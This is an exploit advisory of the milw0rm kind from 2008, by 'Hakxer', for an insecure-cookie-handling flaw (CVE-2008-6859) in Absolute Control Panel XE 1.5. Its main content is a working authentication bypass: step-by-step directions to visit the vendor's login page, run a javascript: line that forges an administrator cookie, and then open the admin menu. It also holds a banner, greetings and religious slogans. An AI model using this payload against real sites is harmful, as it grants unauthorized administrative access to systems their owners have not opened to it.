[] NeoSense

Absolute Control Panel XE 1.5 - Insecure Cookie Handling

Author: Hakxer
type: webapps
platform: php
port: 
date_added: 2008-10-30 
date_updated:  
verified: 1 
codes: OSVDB-55913;CVE-2008-6859 
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################################
 _____    ____   __  ___    ______   ______       |   ____   _____     _____
|        / ___|  \ \ / /   / ____|  /      |      |  |      |  _  \   |
|_____  | |  _    \ V /    | |      |      |   ___|  |_____ | |_)  |  |_____
|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
|_____   \____|    |_|      \_____|  \_____/  |___|  |____  |__| \_\  ______|

[~] Discovered By : Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp
Second Execute JS Code
[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1";
Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp

--- Proud To Be A Muslim ---

# _=END=_ #

# milw0rm.com [2008-10-31]